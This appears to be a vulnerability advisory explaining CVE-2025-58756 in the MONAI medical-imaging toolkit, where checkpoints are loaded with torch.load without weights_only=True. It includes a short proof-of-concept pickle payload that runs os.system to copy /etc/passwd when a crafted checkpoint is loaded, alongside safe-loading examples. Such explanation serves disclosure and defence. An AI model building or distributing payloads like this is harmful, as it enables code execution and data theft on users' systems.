Overview
CVE-2025-58756 is a critical vulnerability discovered in the MONAI (Medical Open Network for AI) toolkit, a popular AI framework for healthcare imaging. The flaw stems from an insecure model-loading method and can allow an attacker to execute malicious code, compromise the system, and leak data. It is particularly worrisome given MONAI's widespread use in the healthcare sector, which makes affected deployments a prime target for cybercriminals seeking sensitive medical data.
Vulnerability Summary
CVE ID: CVE-2025-58756
Severity: Critical – CVSS 8.8
Attack Vector: Remote
Privileges Required: None
User Interaction: None
Impact: Potential system compromise and data leakage
Affected Products
| Product | Affected Versions |
| --- | --- |
| MONAI | Up to and including 1.5.0 |
How the Exploit Works
The vulnerability lies in the way MONAI loads checkpoints. While the call `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` in monai/bundle/scripts.py deserializes checkpoints safely, other places in the project load checkpoints without the `weights_only=True` safeguard. This insecure loading can be exploited when users, seeking to reduce training time and cost, load pre-trained models downloaded from other platforms. If a malicious actor can tamper with these pre-trained models or checkpoints, they can embed a payload that triggers a deserialization vulnerability when the file is loaded, resulting in arbitrary code execution.
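To make the distinction concrete, the sketch below contrasts the two loading patterns under discussion; the file path is hypothetical:

```python
import torch

# Safe pattern (as used in monai/bundle/scripts.py): weights_only=True
# restricts unpickling to tensors and other allow-listed types, so an
# embedded object cannot run code during deserialization.
model_dict = torch.load("checkpoint.pth", map_location="cpu", weights_only=True)

# Unsafe pattern: without weights_only=True (the default in older PyTorch
# releases), torch.load performs full pickle deserialization and will
# execute any __reduce__ payload embedded in the file.
model_dict = torch.load("checkpoint.pth", map_location="cpu")
```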
Conceptual Example Code
One conceptual route to exploitation is for an attacker to craft a malicious pre-trained model or checkpoint; when the victim loads it, the embedded payload executes. Below is a simplified example:
```python
import os
import torch

# Attacker crafts an object whose deserialization runs a shell command
class MaliciousModel:
    def __reduce__(self):
        return (os.system, ('cat /etc/passwd > /tmp/passwd_copy',))

checkpoint = {
    'model': MaliciousModel(),
    # other legitimate-looking data
}

# Attacker saves the crafted checkpoint and distributes it as a pre-trained model
torch.save(checkpoint, 'malicious_checkpoint.pth')

# Victim loads the checkpoint without weights_only=True; pickle invokes
# __reduce__ and the command executes
torch.load('malicious_checkpoint.pth')
```
In this example, when the malicious object is deserialized, pickle invokes `os.system` with the argument `'cat /etc/passwd > /tmp/passwd_copy'`, copying the contents of `/etc/passwd` to a temporary file.
Please note that this is a simplified example and the actual exploitation may involve more complex steps and obfuscation techniques.
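As a defensive illustration, the same safeguard already present in monai/bundle/scripts.py would reject the crafted file above. This is a minimal sketch, reusing the hypothetical checkpoint name from the example:

```python
import torch

# With weights_only=True, torch.load refuses to unpickle arbitrary objects
# such as MaliciousModel, raising an error instead of executing the payload.
try:
    torch.load("malicious_checkpoint.pth", map_location="cpu", weights_only=True)
except Exception as exc:  # typically an UnpicklingError naming the blocked global
    print(f"Checkpoint rejected: {exc}")
```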